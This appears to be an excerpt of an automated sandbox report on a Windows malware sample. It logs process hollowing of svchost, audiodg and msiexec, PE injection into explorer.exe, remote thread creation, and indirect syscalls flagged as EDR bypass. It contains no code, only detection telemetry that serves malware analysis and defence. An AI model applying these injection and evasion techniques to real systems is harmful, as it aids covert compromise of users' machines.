              Source: C:\Windows\explorer.exeCode function: 5_2_0DFA9920 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,5_2_0DFA9920
              Source: C:\Windows\explorer.exeCode function: 5_2_0E109920 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,5_2_0E109920
              Source: C:\Windows\explorer.exeCode function: 5_2_0FF49920 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,5_2_0FF49920
              Creates a thread in another existing process (thread injection)
              Source: C:\Windows\System32\audiodg.exeThread created: C:\Windows\explorer.exe EIP: DED0000Jump to behavior
              Source: C:\Windows\System32\svchost.exeThread created: C:\Windows\explorer.exe EIP: 8220000Jump to behavior
              Source: C:\Windows\System32\msiexec.exeThread created: C:\Windows\explorer.exe EIP: E080000Jump to behavior
              Found direct / indirect Syscall (likely to bypass EDR)
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeNtUnmapViewOfSection: Indirect: 0x7FF7E83C2860Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeNtUnmapViewOfSection: Indirect: 0x7FF6C5DB2860Jump to behavior
              Injects a PE file into a foreign processes
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6EC840000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF67E6D0000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF6345C0000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\System32\audiodg.exeMemory written: C:\Windows\explorer.exe base: DED0535 value starts with: 4D5AJump to behavior
              Source: C:\Windows\System32\svchost.exeMemory written: C:\Windows\explorer.exe base: 8220535 value starts with: 4D5AJump to behavior
              Source: C:\Windows\System32\msiexec.exeMemory written: C:\Windows\explorer.exe base: E080535 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF67E6D0000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6EC840000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF6345C0000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF67E6D0000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF6345C0000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6EC840000 value starts with: 4D5AJump to behavior
              Injects code into the Windows Explorer (explorer.exe)
              Source: C:\Windows\System32\audiodg.exeMemory written: PID: 4084 base: DED0000 value: 40Jump to behavior
              Source: C:\Windows\System32\audiodg.exeMemory written: PID: 4084 base: DED0535 value: 4DJump to behavior
              Source: C:\Windows\System32\svchost.exeMemory written: PID: 4084 base: 8220000 value: 40Jump to behavior
              Source: C:\Windows\System32\svchost.exeMemory written: PID: 4084 base: 8220535 value: 4DJump to behavior
              Source: C:\Windows\System32\msiexec.exeMemory written: PID: 4084 base: E080000 value: 40Jump to behavior
              Source: C:\Windows\System32\msiexec.exeMemory written: PID: 4084 base: E080535 value: 4DJump to behavior
              Modifies the context of a thread in another process (thread injection)
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeThread register set: target process: 7660Jump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeThread register set: target process: 7668Jump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeThread register set: target process: 7676Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeThread register set: target process: 7956Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeThread register set: target process: 7968Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeThread register set: target process: 7976Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeThread register set: target process: 7280Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeThread register set: target process: 7324Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeThread register set: target process: 7308Jump to behavior
              Sample uses process hollowing technique
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeSection unmapped: C:\Windows\System32\audiodg.exe base address: 7FF6EC840000Jump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeSection unmapped: C:\Windows\System32\svchost.exe base address: 7FF67E6D0000Jump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeSection unmapped: C:\Windows\System32\msiexec.exe base address: 7FF6345C0000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeSection unmapped: C:\Windows\System32\svchost.exe base address: 7FF67E6D0000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeSection unmapped: C:\Windows\System32\audiodg.exe base address: 7FF6EC840000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeSection unmapped: C:\Windows\System32\msiexec.exe base address: 7FF6345C0000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeSection unmapped: C:\Windows\System32\svchost.exe base address: 7FF67E6D0000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeSection unmapped: C:\Windows\System32\msiexec.exe base address: 7FF6345C0000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeSection unmapped: C:\Windows\System32\audiodg.exe base address: 7FF6EC840000Jump to behavior
              Writes to foreign memory regions
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6EC840000Jump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6EC841000Jump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6EC845000Jump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6EC848000Jump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6EC849000Jump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6EC84A000Jump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6EC84B000Jump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeMemory written: C:\Windows\System32\audiodg.exe base: 2B3B69B010Jump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF67E6D0000Jump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF67E6D1000Jump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF67E6D5000Jump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF67E6D8000Jump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF67E6D9000Jump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF67E6DA000Jump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF67E6DB000Jump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeMemory written: C:\Windows\System32\svchost.exe base: 6B29C85010Jump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF6345C0000Jump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF6345C1000Jump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF6345C5000Jump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF6345C8000Jump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF6345C9000Jump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF6345CA000Jump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF6345CB000Jump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeMemory written: C:\Windows\System32\msiexec.exe base: 59BF2D5010Jump to behavior
              Source: C:\Windows\System32\audiodg.exeMemory written: C:\Windows\explorer.exe base: DED0000Jump to behavior
              Source: C:\Windows\System32\audiodg.exeMemory written: C:\Windows\explorer.exe base: DED0535Jump to behavior
              Source: C:\Windows\System32\svchost.exeMemory written: C:\Windows\explorer.exe base: 8220000Jump to behavior
              Source: C:\Windows\System32\svchost.exeMemory written: C:\Windows\explorer.exe base: 8220535Jump to behavior
              Source: C:\Windows\System32\msiexec.exeMemory written: C:\Windows\explorer.exe base: E080000Jump to behavior
              Source: C:\Windows\System32\msiexec.exeMemory written: C:\Windows\explorer.exe base: E080535Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF67E6D0000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF67E6D1000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF67E6D5000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF67E6D8000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF67E6D9000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF67E6DA000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF67E6DB000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\svchost.exe base: 8CE9162010Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6EC840000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6EC841000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6EC845000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6EC848000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6EC849000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6EC84A000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6EC84B000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\audiodg.exe base: 2DE85C7010Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF6345C0000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF6345C1000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF6345C5000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF6345C8000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF6345C9000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF6345CA000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF6345CB000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\msiexec.exe base: 4C90AB6010Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF67E6D0000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF67E6D1000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF67E6D5000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF67E6D8000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF67E6D9000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF67E6DA000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF67E6DB000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\svchost.exe base: A1D75B0010Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF6345C0000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF6345C1000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF6345C5000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF6345C8000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF6345C9000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF6345CA000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF6345CB000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\msiexec.exe base: 598E9E8010Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6EC840000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6EC841000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6EC845000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6EC848000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6EC849000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6EC84A000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6EC84B000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\audiodg.exe base: BA99A8E010Jump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"Jump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"Jump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeProcess created: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe "C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe" Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"Jump to behavior
              Source: explorer.exe, 00000005.00000000.1416909270.00000000044D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1414659033.0000000001091000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.2673444234.0000000001090000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
              Source: explorer.exe, 00000005.00000000.1414659033.0000000001091000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.2673444234.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.2672592892.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
              Source: explorer.exe, 00000005.00000000.1414659033.0000000001091000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.2673444234.0000000001090000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
              Source: explorer.exe, 00000005.00000000.1414659033.0000000001091000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.2673444234.0000000001090000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
              Source: explorer.exe, 00000005.00000002.2682385928.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1420653874.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2159103753.000000000936E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd]1Q
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFC17DC cpuid 5_2_0DFC17DC
              Source: C:\Windows\explorer.exeCode function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,5_2_0DFCA5F0
              Source: C:\Windows\explorer.exeCode function: _calloc_crt,_malloc_crt,free,_malloc_crt,free,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon,free,free,free,free,5_2_0DFC8520
              Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,5_2_0DFCA4EC
              Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP,5_2_0DFCA438
              Source: C:\Windows\explorer.exeCode function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_getptd,GetLocaleInfoEx,5_2_0DFC9FCC
              Source: C:\Windows\explorer.exeCode function: _getptd,__lc_wcstolc,__get_qualified_locale,__lc_lctowcs,GetLocaleInfoEx,GetACP,5_2_0DFC2EAC
              Source: C:\Windows\explorer.exeCode function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,free,5_2_0DFC0EA8
              Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,malloc,GetLocaleInfoEx,WideCharToMultiByte,free,5_2_0DFC80F0
              Source: C:\Windows\explorer.exeCode function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,GetCPInfo,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,free,free,free,free,free,free,free,free,free,5_2_0DFBF8DC
              Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,5_2_0DFD0370
              Source: C:\Windows\explorer.exeCode function: _calloc_crt,_malloc_crt,free,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,free,free,free,5_2_0DFC8AAC
              Source: C:\Windows\explorer.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,5_2_0DFC824C
              Source: C:\Windows\explorer.exeCode function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,5_2_0DFC9234
              Source: C:\Windows\explorer.exeCode function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,free,5_2_0E120EA8
              Source: C:\Windows\explorer.exeCode function: _getptd,__lc_wcstolc,__get_qualified_locale,__lc_lctowcs,GetLocaleInfoEx,GetACP,5_2_0E122EAC
              Source: C:\Windows\explorer.exeCode function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_getptd,GetLocaleInfoEx,5_2_0E129FCC
              Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP,5_2_0E12A438
              Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,5_2_0E12A4EC
              Source: C:\Windows\explorer.exeCode function: _calloc_crt,_malloc_crt,free,_malloc_crt,free,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon,free,free,free,free,5_2_0E128520
              Source: C:\Windows\explorer.exeCode function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,5_2_0E12A5F0
